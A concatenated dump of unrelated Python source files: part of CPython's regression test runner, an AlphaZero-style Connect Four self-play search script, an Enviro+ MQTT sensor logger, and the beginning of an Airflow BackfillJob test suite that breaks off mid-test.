except (TypeError, ValueError):
continue
return pairings
def restore_locale(self, saved):
for lc, setting in saved:
locale.setlocale(lc, setting)
def get_warnings_showwarning(self):
return warnings.showwarning
def restore_warnings_showwarning(self, fxn):
warnings.showwarning = fxn
def resource_info(self):
for name in self.resources:
method_suffix = name.replace('.', '_')
get_name = 'get_' + method_suffix
restore_name = 'restore_' + method_suffix
yield name, getattr(self, get_name), getattr(self, restore_name)
def __enter__(self):
self.saved_values = dict((name, get()) for name, get, restore
in self.resource_info())
return self
def __exit__(self, exc_type, exc_val, exc_tb):
saved_values = self.saved_values
del self.saved_values
for name, get, restore in self.resource_info():
current = get()
original = saved_values.pop(name)
# Check for changes to the resource's value
if current != original:
self.changed = True
restore(original)
if not self.quiet:
print("Warning -- {} was modified by {}".format(
name, self.testname),
file=sys.stderr)
if self.verbose > 1:
print(" Before: {}\n After: {} ".format(
original, current),
file=sys.stderr)
return False
def runtest_inner(test, verbose, quiet,
huntrleaks=False, display_failure=True):
support.unload(test)
test_time = 0.0
refleak = False # True if the test leaked references.
try:
if test.startswith('test.'):
abstest = test
else:
# Always import it from the test package
abstest = 'test.' + test
with saved_test_environment(test, verbose, quiet) as environment:
start_time = time.time()
the_module = importlib.import_module(abstest)
# If the test has a test_main, that will run the appropriate
# tests. If not, use normal unittest test loading.
test_runner = getattr(the_module, "test_main", None)
if test_runner is None:
def test_runner():
loader = unittest.TestLoader()
tests = loader.loadTestsFromModule(the_module)
for error in loader.errors:
print(error, file=sys.stderr)
if loader.errors:
raise Exception("errors while loading tests")
support.run_unittest(tests)
test_runner()
if huntrleaks:
refleak = dash_R(the_module, test, test_runner, huntrleaks)
test_time = time.time() - start_time
except support.ResourceDenied as msg:
if not quiet:
print(test, "skipped --", msg)
sys.stdout.flush()
return RESOURCE_DENIED, test_time
except unittest.SkipTest as msg:
if not quiet:
print(test, "skipped --", msg)
sys.stdout.flush()
return SKIPPED, test_time
except KeyboardInterrupt:
raise
except support.TestFailed as msg:
if display_failure:
print("test", test, "failed --", msg, file=sys.stderr)
else:
print("test", test, "failed", file=sys.stderr)
sys.stderr.flush()
return FAILED, test_time
except:
msg = traceback.format_exc()
print("test", test, "crashed --", msg, file=sys.stderr)
sys.stderr.flush()
return FAILED, test_time
else:
if refleak:
return FAILED, test_time
if environment.changed:
return ENV_CHANGED, test_time
return PASSED, test_time
def cleanup_test_droppings(testname, verbose):
import shutil
import stat
import gc
# First kill any dangling references to open files etc.
# This can also issue some ResourceWarnings which would otherwise get
# triggered during the following test run, and possibly produce failures.
gc.collect()
    # Try to clean up junk commonly left behind. While tests shouldn't leave
    # any files or directories behind, arranging that can be tedious when a
    # test fails. The consequences can be especially nasty on Windows, since
    # a file a test left open cannot be deleted by name; there's nothing we
    # can do about that here either, but we can at least display the name of
    # the offending test, which is a real help.
for name in (support.TESTFN,
"db_home",
):
if not os.path.exists(name):
continue
if os.path.isdir(name):
kind, nuker = "directory", shutil.rmtree
elif os.path.isfile(name):
kind, nuker = "file", os.unlink
else:
raise SystemError("os.path says %r exists but is neither "
"directory nor file" % name)
if verbose:
print("%r left behind %s %r" % (testname, kind, name))
try:
# if we have chmod, fix possible permissions problems
# that might prevent cleanup
if (hasattr(os, 'chmod')):
os.chmod(name, stat.S_IRWXU | stat.S_IRWXG | stat.S_IRWXO)
nuker(name)
except Exception as msg:
print(("%r left behind %s %r and it couldn't be "
"removed: %s" % (testname, kind, name, msg)), file=sys.stderr)
def dash_R(the_module, test, indirect_test, huntrleaks):
"""Run a test multiple times, looking for reference leaks.
Returns:
False if the test didn't leak references; True if we detected refleaks.
"""
# This code is hackish and inelegant, but it seems to do the job.
import copyreg
import collections.abc
if not hasattr(sys, 'gettotalrefcount'):
raise Exception("Tracking reference leaks requires a debug build "
"of Python")
# Save current values for dash_R_cleanup() to restore.
fs = warnings.filters[:]
ps = copyreg.dispatch_table.copy()
pic = sys.path_importer_cache.copy()
try:
import zipimport
except ImportError:
zdc = None # Run unmodified on platforms without zipimport support
else:
zdc = zipimport._zip_directory_cache.copy()
abcs = {}
for abc in [getattr(collections.abc, a) for a in collections.abc.__all__]:
if not isabstract(abc):
continue
for obj in abc.__subclasses__() + [abc]:
abcs[obj] = obj._abc_registry.copy()
nwarmup, ntracked, fname = huntrleaks
fname = os.path.join(support.SAVEDCWD, fname)
repcount = nwarmup + ntracked
rc_deltas = [0] * repcount
alloc_deltas = [0] * repcount
print("beginning", repcount, "repetitions", file=sys.stderr)
print(("1234567890"*(repcount//10 + 1))[:repcount], file=sys.stderr)
sys.stderr.flush()
for i in range(repcount):
indirect_test()
alloc_after, rc_after = dash_R_cleanup(fs, ps, pic, zdc, abcs)
sys.stderr.write('.')
sys.stderr.flush()
if i >= nwarmup:
rc_deltas[i] = rc_after - rc_before
alloc_deltas[i] = alloc_after - alloc_before
alloc_before, rc_before = alloc_after, rc_after
print(file=sys.stderr)
# These checkers return False on success, True on failure
def check_rc_deltas(deltas):
return any(deltas)
def check_alloc_deltas(deltas):
# At least 1/3rd of 0s
if 3 * deltas.count(0) < len(deltas):
return True
# Nothing else than 1s, 0s and -1s
if not set(deltas) <= {1,0,-1}:
return True
return False
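    # Worked example of the checkers above (illustrative values only):
    #   check_alloc_deltas([0, 1, 0, 0, -1, 0]) -> False: four of six entries
    #     are 0 (so 3*4 >= 6) and every value is in {-1, 0, 1}, which is
    #     treated as allocator jitter rather than a leak.
    #   check_alloc_deltas([2, 2, 2, 2]) -> True: no zeros at all, so the run
    #     is flagged as leaking memory blocks.
    #   check_rc_deltas([0, 0, 3, 0]) -> True: any non-zero refcount delta is
    #     reported as a reference leak.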
failed = False
for deltas, item_name, checker in [
(rc_deltas, 'references', check_rc_deltas),
(alloc_deltas, 'memory blocks', check_alloc_deltas)]:
if checker(deltas):
msg = '%s leaked %s %s, sum=%s' % (
test, deltas[nwarmup:], item_name, sum(deltas))
print(msg, file=sys.stderr)
sys.stderr.flush()
with open(fname, "a") as refrep:
print(msg, file=refrep)
refrep.flush()
failed = True
return failed
def dash_R_cleanup(fs, ps, pic, zdc, abcs):
import gc, copyreg
import _strptime, linecache
import urllib.parse, urllib.request, mimetypes, doctest
import struct, filecmp, collections.abc
from distutils.dir_util import _path_created
from weakref import WeakSet
# Clear the warnings registry, so they can be displayed again
for mod in sys.modules.values():
if hasattr(mod, '__warningregistry__'):
del mod.__warningregistry__
# Restore some original values.
warnings.filters[:] = fs
copyreg.dispatch_table.clear()
copyreg.dispatch_table.update(ps)
sys.path_importer_cache.clear()
sys.path_importer_cache.update(pic)
try:
import zipimport
except ImportError:
pass # Run unmodified on platforms without zipimport support
else:
zipimport._zip_directory_cache.clear()
zipimport._zip_directory_cache.update(zdc)
# clear type cache
sys._clear_type_cache()
# Clear ABC registries, restoring previously saved ABC registries.
for abc in [getattr(collections.abc, a) for a in collections.abc.__all__]:
if not isabstract(abc):
continue
for obj in abc.__subclasses__() + [abc]:
obj._abc_registry = abcs.get(obj, WeakSet()).copy()
obj._abc_cache.clear()
obj._abc_negative_cache.clear()
# Flush standard output, so that buffered data is sent to the OS and
# associated Python objects are reclaimed.
for stream in (sys.stdout, sys.stderr, sys.__stdout__, sys.__stderr__):
if stream is not None:
stream.flush()
# Clear assorted module caches.
_path_created.clear()
re.purge()
_strptime._regex_cache.clear()
urllib.parse.clear_cache()
urllib.request.urlcleanup()
linecache.clearcache()
mimetypes._default_mime_types()
filecmp._cache.clear()
struct._clearcache()
doctest.master = None
try:
import ctypes
except ImportError:
# Don't worry about resetting the cache if ctypes is not supported
pass
else:
ctypes._reset_cache()
# Collect cyclic trash and read memory statistics immediately after.
func1 = sys.getallocatedblocks
func2 = sys.gettotalrefcount
gc.collect()
return func1(), func2()
def warm_caches():
# char cache
s = bytes(range(256))
for i in range(256):
s[i:i+1]
# unicode cache
x = [chr(i) for i in range(256)]
# int cache
x = list(range(-5, 257))
def findtestdir(path=None):
return path or os.path.dirname(__file__) or os.curdir
def removepy(names):
if not names:
return
for idx, name in enumerate(names):
basename, ext = os.path.splitext(name)
if ext == '.py':
names[idx] = basename
def count(n, word):
if n == 1:
return "%d %s" % (n, word)
else:
return "%d %ss" % (n, word)
def printlist(x, width=70, indent=4):
"""Print the elements of iterable x to stdout.
Optional arg width (default 70) is the maximum line length.
Optional arg indent (default 4) is the number of blanks with which to
begin each line.
"""
from textwrap import fill
blanks = ' ' * indent
# Print the sorted list: 'x' may be a '--random' list or a set()
print(fill(' '.join(str(elt) for elt in sorted(x)), width,
initial_indent=blanks, subsequent_indent=blanks))
def main_in_temp_cwd():
"""Run main() in a temporary working directory."""
if sysconfig.is_python_build():
try:
os.mkdir(TEMPDIR)
except FileExistsError:
pass
# Define a writable temp dir that will be used as cwd while running
# the tests. The name of the dir includes the pid to allow parallel
# testing (see the -j option).
test_cwd = 'test_python_{}'.format(os.getpid())
test_cwd = os.path.join(TEMPDIR, test_cwd)
# Run the tests in a context manager that temporarily changes the CWD to a
# temporary and writable directory. If it's not possible to create or
# change the CWD, the original CWD will be used. The original CWD is
# available from support.SAVEDCWD.
with support.temp_cwd(test_cwd, quiet=True):
main()
if __name__ == '__main__':
# Remove regrtest.py's own directory from the module search path. Despite
# the elimination of implicit relative imports, this is still needed to
# ensure that submodules of the test package do not inappropriately appear
# as top-level modules even when people (or buildbots!) invoke regrtest.py
# directly instead of using the -m switch
mydir = os.path.abspath(os.path.normpath(os.path.dirname(sys.argv[0])))
i = len(sys.path)
while i >= 0:
i -= 1
if os.path.abspath(os.path.normpath(sys.path[i])) == mydir:
del sys.path[i]
# findtestdir() gets the dirname out of __file__, so we have to make it
# absolute before changing the working directory.
# For example __file__ may be relative when running trace or profile.
# See issue #9323.
__file__ = os.path.abspath(__file__)
# sanity check
assert __file__ == os.path.abspath(sys.argv[0])
main_in_temp_cwd()
|
MCTS_c4.py
|
#!/usr/bin/env python
import pickle
import os
import collections
import numpy as np
import math
import encoder_decoder_c4 as ed
from connect_board import board as c_board
import copy
import torch
import torch.multiprocessing as mp
from alpha_net_c4 import ConnectNet
import datetime
import logging
from tqdm import tqdm
logging.basicConfig(format='%(asctime)s [%(levelname)s]: %(message)s', \
datefmt='%m/%d/%Y %I:%M:%S %p', level=logging.INFO)
logger = logging.getLogger(__file__)
def save_as_pickle(filename, data):
completeName = os.path.join("./datasets/",\
filename)
with open(completeName, 'wb') as output:
pickle.dump(data, output)
def load_pickle(filename):
completeName = os.path.join("./datasets/",\
filename)
with open(completeName, 'rb') as pkl_file:
data = pickle.load(pkl_file)
return data
class UCTNode():
def __init__(self, game, move, parent=None):
self.game = game # state s
self.move = move # action index
self.is_expanded = False
self.parent = parent
self.children = {}
self.child_priors = np.zeros([7], dtype=np.float32)
self.child_total_value = np.zeros([7], dtype=np.float32)
self.child_number_visits = np.zeros([7], dtype=np.float32)
self.action_idxes = []
@property
def number_visits(self):
return self.parent.child_number_visits[self.move]
@number_visits.setter
def number_visits(self, value):
self.parent.child_number_visits[self.move] = value
@property
def total_value(self):
return self.parent.child_total_value[self.move]
@total_value.setter
def total_value(self, value):
self.parent.child_total_value[self.move] = value
def child_Q(self):
return self.child_total_value / (1 + self.child_number_visits)
def child_U(self):
return math.sqrt(self.number_visits) * (
abs(self.child_priors) / (1 + self.child_number_visits))
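    # Added commentary: child_Q() and child_U() together implement a
    # PUCT-style selection rule.  For each action a from this node,
    # Q(a) = W(a) / (1 + N(a)) is the mean value and
    # U(a) = sqrt(N) * P(a) / (1 + N(a)) is the exploration bonus, where N is
    # this node's own visit count and P(a) the network prior; best_child()
    # below picks argmax_a [Q(a) + U(a)].  The abs() around the priors is
    # redundant for softmax outputs (already non-negative) but harmless.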
def best_child(self):
if self.action_idxes != []:
bestmove = self.child_Q() + self.child_U()
bestmove = self.action_idxes[np.argmax(bestmove[self.action_idxes])]
else:
bestmove = np.argmax(self.child_Q() + self.child_U())
return bestmove
def select_leaf(self):
current = self
while current.is_expanded:
best_move = current.best_child()
current = current.maybe_add_child(best_move)
return current
def add_dirichlet_noise(self,action_idxs,child_priors):
valid_child_priors = child_priors[action_idxs] # select only legal moves entries in child_priors array
valid_child_priors = 0.75*valid_child_priors + 0.25*np.random.dirichlet(np.zeros([len(valid_child_priors)], \
dtype=np.float32)+192)
child_priors[action_idxs] = valid_child_priors
return child_priors
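    # Added commentary: this mirrors the AlphaZero-style root exploration
    # noise P'(a) = 0.75 * P(a) + 0.25 * Dirichlet(alpha), applied only at
    # the root (see expand() below).  The concentration is built here as
    # np.zeros(...) + 192, i.e. alpha = 192 per legal move, which yields
    # near-uniform noise rather than the spiky noise produced by the small
    # alphas (around 0.3) reported in the AlphaZero papers; whether that is
    # intentional cannot be told from this file alone.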
def expand(self, child_priors):
self.is_expanded = True
action_idxs = self.game.actions()
c_p = child_priors
if action_idxs == []:
self.is_expanded = False
self.action_idxes = action_idxs
        c_p[[i for i in range(len(child_priors)) if i not in action_idxs]] = 0.0 # mask all illegal actions
if self.parent.parent is None: # add dirichlet noise to child_priors in root node
c_p = self.add_dirichlet_noise(action_idxs,c_p)
self.child_priors = c_p
def decode_n_move_pieces(self,board,move):
board.drop_piece(move)
return board
def maybe_add_child(self, move):
if move not in self.children:
copy_board = copy.deepcopy(self.game) # make copy of board
copy_board = self.decode_n_move_pieces(copy_board,move)
self.children[move] = UCTNode(
copy_board, move, parent=self)
return self.children[move]
def backup(self, value_estimate: float):
current = self
while current.parent is not None:
current.number_visits += 1
if current.game.player == 1: # same as current.parent.game.player = 0
current.total_value += (1*value_estimate) # value estimate +1 = O wins
elif current.game.player == 0: # same as current.parent.game.player = 1
current.total_value += (-1*value_estimate)
current = current.parent
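    # Added commentary: backup() walks from the evaluated leaf back to the
    # root, incrementing each node's visit count and accumulating the network
    # value estimate with a sign chosen by which player moved into the node,
    # so every node's statistics are kept from its own player's perspective.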
class DummyNode(object):
def __init__(self):
self.parent = None
self.child_total_value = collections.defaultdict(float)
self.child_number_visits = collections.defaultdict(float)
def UCT_search(game_state, num_reads,net,temp):
root = UCTNode(game_state, move=None, parent=DummyNode())
for _ in range(num_reads):
leaf = root.select_leaf()
encoded_s = ed.encode_board(leaf.game)
encoded_s = encoded_s.transpose(2,0,1)
        encoded_s = torch.from_numpy(encoded_s).float()
        if torch.cuda.is_available():
            # only move the input to GPU when one exists; run_MCTS() only calls
            # net.cuda() in that case, so this keeps model and input consistent
            encoded_s = encoded_s.cuda()
child_priors, value_estimate = net(encoded_s)
child_priors = child_priors.detach().cpu().numpy().reshape(-1)
value_estimate = value_estimate.item()
if leaf.game.check_winner() == True or leaf.game.actions() == []: # if somebody won or draw
leaf.backup(value_estimate); continue
leaf.expand(child_priors) # need to make sure valid moves
leaf.backup(value_estimate)
return root
def do_decode_n_move_pieces(board,move):
board.drop_piece(move)
return board
def get_policy(root, temp=1):
#policy = np.zeros([7], dtype=np.float32)
#for idx in np.where(root.child_number_visits!=0)[0]:
# policy[idx] = ((root.child_number_visits[idx])**(1/temp))/sum(root.child_number_visits**(1/temp))
return ((root.child_number_visits)**(1/temp))/sum(root.child_number_visits**(1/temp))
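# Added commentary: get_policy() turns root visit counts into the final move
# distribution pi(a) = N(a)**(1/temp) / sum_b N(b)**(1/temp).  With temp = 1
# this reproduces the raw visit proportions, larger temperatures flatten the
# distribution, and temp -> 0 sharpens it towards the single most-visited
# move (the self-play loop below drops from args.temperature_MCTS to 0.1
# once move_count reaches 11 for exactly that reason).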
def MCTS_self_play(connectnet, num_games, start_idx, cpu, args, iteration):
logger.info("[CPU: %d]: Starting MCTS self-play..." % cpu)
if not os.path.isdir("./datasets/iter_%d" % iteration):
if not os.path.isdir("datasets"):
os.mkdir("datasets")
os.mkdir("datasets/iter_%d" % iteration)
for idxx in tqdm(range(start_idx, num_games + start_idx)):
logger.info("[CPU: %d]: Game %d" % (cpu, idxx))
current_board = c_board()
checkmate = False
dataset = [] # to get state, policy, value for neural network training
states = []
value = 0
move_count = 0
while not checkmate and current_board.actions() != []:
t = args.temperature_MCTS if move_count < 11 else 0.1
states.append(copy.deepcopy(current_board.current_board))
board_state = copy.deepcopy(ed.encode_board(current_board))
root = UCT_search(current_board,777,connectnet,t)
policy = get_policy(root, t)
print("[CPU: %d]: Game %d POLICY:\n " % (cpu, idxx), policy)
current_board = do_decode_n_move_pieces(current_board,\
np.random.choice(np.array([0,1,2,3,4,5,6]), \
p = policy)) # decode move and move piece(s)
dataset.append([board_state,policy])
print("[Iteration: %d CPU: %d]: Game %d CURRENT BOARD:\n" % (iteration, cpu, idxx), current_board.current_board,current_board.player)
print(" ")
if current_board.check_winner() == True: # if somebody won
if current_board.player == 0: # black wins
value = -1
elif current_board.player == 1: # white wins
value = 1
checkmate = True
move_count += 1
dataset_p = []
for idx,data in enumerate(dataset):
s,p = data
if idx == 0:
dataset_p.append([s,p,0])
else:
dataset_p.append([s,p,value])
del dataset
save_as_pickle("iter_%d/" % iteration +\
"dataset_iter%d_cpu%i_%i_%s" % (iteration, cpu, idxx, datetime.datetime.today().strftime("%Y-%m-%d")), dataset_p)
def run_MCTS(args, start_idx=0, iteration=0):
net_to_play="%s_iter%d.pth.tar" % (args.neural_net_name, iteration)
net = ConnectNet()
    if torch.cuda.is_available():
net.cuda()
if args.MCTS_num_processes > 1:
logger.info("Preparing model for multi-process MCTS...")
mp.set_start_method("spawn",force=True)
net.share_memory()
net.eval()
current_net_filename = os.path.join("./model_data/",\
net_to_play)
if os.path.isfile(current_net_filename):
checkpoint = torch.load(current_net_filename)
net.load_state_dict(checkpoint['state_dict'])
logger.info("Loaded %s model." % current_net_filename)
else:
torch.save({'state_dict': net.state_dict()}, os.path.join("./model_data/",\
net_to_play))
logger.info("Initialized model.")
processes = []
if args.MCTS_num_processes > mp.cpu_count():
num_processes = mp.cpu_count()
logger.info("Required number of processes exceed number of CPUs! Setting MCTS_num_processes to %d" % num_processes)
else:
num_processes = args.MCTS_num_processes
logger.info("Spawning %d processes..." % num_processes)
with torch.no_grad():
for i in range(num_processes):
p = mp.Process(target=MCTS_self_play, args=(net, args.num_games_per_MCTS_process, start_idx, i, args, iteration))
p.start()
processes.append(p)
for p in processes:
p.join()
logger.info("Finished multi-process MCTS!")
elif args.MCTS_num_processes == 1:
logger.info("Preparing model for MCTS...")
net.eval()
current_net_filename = os.path.join("./model_data/",\
net_to_play)
if os.path.isfile(current_net_filename):
checkpoint = torch.load(current_net_filename)
net.load_state_dict(checkpoint['state_dict'])
logger.info("Loaded %s model." % current_net_filename)
else:
torch.save({'state_dict': net.state_dict()}, os.path.join("./model_data/",\
net_to_play))
logger.info("Initialized model.")
with torch.no_grad():
MCTS_self_play(net, args.num_games_per_MCTS_process, start_idx, 0, args, iteration)
logger.info("Finished MCTS!")
|
logger.py
|
import collections, threading, traceback
import paho.mqtt.client as mqtt
try:
# Transitional fix for breaking change in LTR559
from ltr559 import LTR559
ltr559 = LTR559()
except ImportError:
import ltr559
from bme280 import BME280
from pms5003 import PMS5003
from enviroplus import gas
class EnvLogger:
def __init__(self, client_id, host, port, username, password, prefix, use_pms5003, num_samples):
self.bme280 = BME280()
self.prefix = prefix
self.connection_error = None
self.client = mqtt.Client(client_id=client_id)
self.client.on_connect = self.__on_connect
self.client.username_pw_set(username, password)
self.client.connect(host, port)
self.client.loop_start()
self.samples = collections.deque(maxlen=num_samples)
self.latest_pms_readings = {}
if use_pms5003:
self.pm_thread = threading.Thread(target=self.__read_pms_continuously)
self.pm_thread.daemon = True
self.pm_thread.start()
def __on_connect(self, client, userdata, flags, rc):
errors = {
1: "incorrect MQTT protocol version",
2: "invalid MQTT client identifier",
3: "server unavailable",
4: "bad username or password",
5: "connection refused"
}
if rc > 0:
self.connection_error = errors.get(rc, "unknown error")
def __read_pms_continuously(self):
"""Continuously reads from the PMS5003 sensor and stores the most recent values
in `self.latest_pms_readings` as they become available.
        If the sensor is not polled continuously then readings are buffered on the PMS5003,
and over time a significant delay is introduced between changes in PM levels and
the corresponding change in reported levels."""
pms = PMS5003()
while True:
try:
pm_data = pms.read()
self.latest_pms_readings = {
"particulate/1.0": pm_data.pm_ug_per_m3(1.0, atmospheric_environment=True),
"particulate/2.5": pm_data.pm_ug_per_m3(2.5, atmospheric_environment=True),
"particulate/10.0": pm_data.pm_ug_per_m3(None, atmospheric_environment=True),
}
            except Exception:
print("Failed to read from PMS5003. Resetting sensor.")
traceback.print_exc()
pms.reset()
def take_readings(self):
readings = {}
try:
readings["proximity"] = ltr559.get_proximity()
except OSError:
print("Error reading proximity sensor data")
try:
readings["lux"] = ltr559.get_lux()
except OSError:
print("Error reading lux sensor data")
try:
readings["temperature"] = self.bme280.get_temperature()
except OSError:
print("Error reading temperature sensor data")
try:
readings["pressure"] = self.bme280.get_pressure()
except OSError:
print("Error reading pressure sensor data")
try:
readings["humidity"] = self.bme280.get_humidity()
except OSError:
print("Error reading humidity sensor data")
try:
gas_data = gas.read_all()
readings["gas/oxidising"] = gas_data.oxidising
readings["gas/reducing"] = gas_data.reducing
readings["gas/nh3"] = gas_data.nh3
except OSError:
print("Error reading gas sensor data")
readings.update(self.latest_pms_readings)
return readings
def publish(self, topic, value):
topic = self.prefix.strip("/") + "/" + topic
self.client.publish(topic, str(value))
def update(self, publish_readings=True):
self.samples.append(self.take_readings())
if publish_readings:
for topic in self.samples[0].keys():
try:
value_sum = sum([d[topic] for d in self.samples])
value_avg = value_sum / len(self.samples)
self.publish(topic, value_avg)
except KeyError:
print(f"Error publishing data for {topic}")
def destroy(self):
self.client.disconnect()
self.client.loop_stop()
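# Hypothetical usage sketch (not part of the original module; host, credentials
# and prefix below are placeholders):
#
#     logger = EnvLogger(client_id="enviro", host="mqtt.example.com", port=1883,
#                        username="user", password="secret",
#                        prefix="enviro/office", use_pms5003=False,
#                        num_samples=5)
#     try:
#         while True:                     # would also need 'import time'
#             logger.update(publish_readings=True)
#             time.sleep(60)
#     finally:
#         logger.destroy()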
|
test_backfill_job.py
|
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
import datetime
import json
import logging
import threading
from unittest.mock import patch
import pytest
from airflow import settings
from airflow.cli import cli_parser
from airflow.exceptions import (
AirflowException,
AirflowTaskTimeout,
BackfillUnfinished,
DagConcurrencyLimitReached,
NoAvailablePoolSlot,
TaskConcurrencyLimitReached,
)
from airflow.jobs.backfill_job import BackfillJob
from airflow.models import DagBag, Pool, TaskInstance as TI
from airflow.models.dagrun import DagRun
from airflow.models.taskinstance import TaskInstanceKey
from airflow.operators.dummy import DummyOperator
from airflow.utils import timezone
from airflow.utils.dates import days_ago
from airflow.utils.session import create_session
from airflow.utils.state import State
from airflow.utils.timeout import timeout
from airflow.utils.types import DagRunType
from tests.models import TEST_DAGS_FOLDER
from tests.test_utils.db import (
clear_db_dags,
clear_db_pools,
clear_db_runs,
clear_db_xcom,
set_default_pool_slots,
)
from tests.test_utils.mock_executor import MockExecutor
from tests.test_utils.timetables import cron_timetable
logger = logging.getLogger(__name__)
DEFAULT_DATE = timezone.datetime(2016, 1, 1)
@pytest.fixture(scope="module")
def dag_bag():
return DagBag(include_examples=True)
class TestBackfillJob:
@staticmethod
def clean_db():
clear_db_dags()
clear_db_runs()
clear_db_xcom()
clear_db_pools()
@pytest.fixture(autouse=True)
def set_instance_attrs(self, dag_bag):
self.clean_db()
self.parser = cli_parser.get_parser()
self.dagbag = dag_bag
def _get_dummy_dag(
self,
dag_maker_fixture,
dag_id='test_dag',
pool=Pool.DEFAULT_POOL_NAME,
max_active_tis_per_dag=None,
task_id='op',
**kwargs,
):
with dag_maker_fixture(dag_id=dag_id, schedule_interval='@daily', **kwargs) as dag:
DummyOperator(task_id=task_id, pool=pool, max_active_tis_per_dag=max_active_tis_per_dag)
return dag
def _times_called_with(self, method, class_):
count = 0
for args in method.call_args_list:
if isinstance(args[0][0], class_):
count += 1
return count
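    # Added commentary: mock_log.debug.call_args_list records one entry per
    # debug() call; args[0][0] is its first positional argument, so this
    # helper counts how many debug messages were emitted with an instance of
    # the given exception class (e.g. NoAvailablePoolSlot) as that argument,
    # presumably because BackfillJob logs the exception objects themselves.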
def test_unfinished_dag_runs_set_to_failed(self, dag_maker):
dag = self._get_dummy_dag(dag_maker)
dag_run = dag_maker.create_dagrun(state=None)
job = BackfillJob(
dag=dag,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE + datetime.timedelta(days=8),
ignore_first_depends_on_past=True,
)
job._set_unfinished_dag_runs_to_failed([dag_run])
dag_run.refresh_from_db()
assert State.FAILED == dag_run.state
def test_dag_run_with_finished_tasks_set_to_success(self, dag_maker):
dag = self._get_dummy_dag(dag_maker)
dag_run = dag_maker.create_dagrun(state=None)
for ti in dag_run.get_task_instances():
ti.set_state(State.SUCCESS)
job = BackfillJob(
dag=dag,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE + datetime.timedelta(days=8),
ignore_first_depends_on_past=True,
)
job._set_unfinished_dag_runs_to_failed([dag_run])
dag_run.refresh_from_db()
assert State.SUCCESS == dag_run.state
@pytest.mark.xfail(condition=True, reason="This test is flaky")
@pytest.mark.backend("postgres", "mysql")
def test_trigger_controller_dag(self):
dag = self.dagbag.get_dag('example_trigger_controller_dag')
target_dag = self.dagbag.get_dag('example_trigger_target_dag')
target_dag.sync_to_db()
# dag_file_processor = DagFileProcessor(dag_ids=[], log=Mock())
task_instances_list = []
# task_instances_list = dag_file_processor._process_task_instances(
# target_dag,
# dag_runs=DagRun.find(dag_id='example_trigger_target_dag')
# )
assert not task_instances_list
job = BackfillJob(
dag=dag, start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_first_depends_on_past=True
)
job.run()
task_instances_list = []
# task_instances_list = dag_file_processor._process_task_instances(
# target_dag,
# dag_runs=DagRun.find(dag_id='example_trigger_target_dag')
# )
assert task_instances_list
@pytest.mark.backend("postgres", "mysql")
def test_backfill_multi_dates(self):
dag = self.dagbag.get_dag('miscellaneous_test_dag')
end_date = DEFAULT_DATE + datetime.timedelta(days=1)
executor = MockExecutor(parallelism=16)
job = BackfillJob(
dag=dag,
start_date=DEFAULT_DATE,
end_date=end_date,
executor=executor,
ignore_first_depends_on_past=True,
)
job.run()
expected_execution_order = [
("runme_0", DEFAULT_DATE),
("runme_1", DEFAULT_DATE),
("runme_2", DEFAULT_DATE),
("runme_0", end_date),
("runme_1", end_date),
("runme_2", end_date),
("also_run_this", DEFAULT_DATE),
("also_run_this", end_date),
("run_after_loop", DEFAULT_DATE),
("run_after_loop", end_date),
("run_this_last", DEFAULT_DATE),
("run_this_last", end_date),
]
assert [
((dag.dag_id, task_id, f'backfill__{when.isoformat()}', 1, -1), (State.SUCCESS, None))
for (task_id, when) in expected_execution_order
] == executor.sorted_tasks
session = settings.Session()
drs = session.query(DagRun).filter(DagRun.dag_id == dag.dag_id).order_by(DagRun.execution_date).all()
assert drs[0].execution_date == DEFAULT_DATE
assert drs[0].state == State.SUCCESS
assert drs[1].execution_date == DEFAULT_DATE + datetime.timedelta(days=1)
assert drs[1].state == State.SUCCESS
dag.clear()
session.close()
@pytest.mark.backend("postgres", "mysql")
@pytest.mark.parametrize(
"dag_id, expected_execution_order",
[
[
"example_branch_operator",
(
"run_this_first",
"branching",
"branch_a",
"branch_b",
"branch_c",
"branch_d",
"follow_branch_a",
"follow_branch_b",
"follow_branch_c",
"follow_branch_d",
"join",
),
],
[
"miscellaneous_test_dag",
("runme_0", "runme_1", "runme_2", "also_run_this", "run_after_loop", "run_this_last"),
],
[
"example_skip_dag",
(
"always_true_1",
"always_true_2",
"skip_operator_1",
"skip_operator_2",
"all_success",
"one_success",
"final_1",
"final_2",
),
],
["latest_only", ("latest_only", "task1")],
],
)
def test_backfill_examples(self, dag_id, expected_execution_order):
"""
Test backfilling example dags
        Try to backfill some of the example dags. Be careful: not all dags are
        suitable for this. For example, a dag that sleeps forever or does not have
        a schedule won't work here, since you simply can't backfill it.
"""
dag = self.dagbag.get_dag(dag_id)
logger.info('*** Running example DAG: %s', dag.dag_id)
executor = MockExecutor()
job = BackfillJob(
dag=dag,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE,
executor=executor,
ignore_first_depends_on_past=True,
)
job.run()
assert [
((dag_id, task_id, f'backfill__{DEFAULT_DATE.isoformat()}', 1, -1), (State.SUCCESS, None))
for task_id in expected_execution_order
] == executor.sorted_tasks
def test_backfill_conf(self, dag_maker):
dag = self._get_dummy_dag(dag_maker, dag_id='test_backfill_conf')
dag_maker.create_dagrun(state=None)
executor = MockExecutor()
conf_ = json.loads("""{"key": "value"}""")
job = BackfillJob(
dag=dag,
executor=executor,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE + datetime.timedelta(days=2),
conf=conf_,
)
job.run()
# We ignore the first dag_run created by fixture
dr = DagRun.find(
dag_id='test_backfill_conf', execution_start_date=DEFAULT_DATE + datetime.timedelta(days=1)
)
assert conf_ == dr[0].conf
@patch('airflow.jobs.backfill_job.BackfillJob.log')
def test_backfill_respect_max_active_tis_per_dag_limit(self, mock_log, dag_maker):
max_active_tis_per_dag = 2
dag = self._get_dummy_dag(
dag_maker,
dag_id='test_backfill_respect_max_active_tis_per_dag_limit',
max_active_tis_per_dag=max_active_tis_per_dag,
)
dag_maker.create_dagrun(state=None)
executor = MockExecutor()
job = BackfillJob(
dag=dag,
executor=executor,
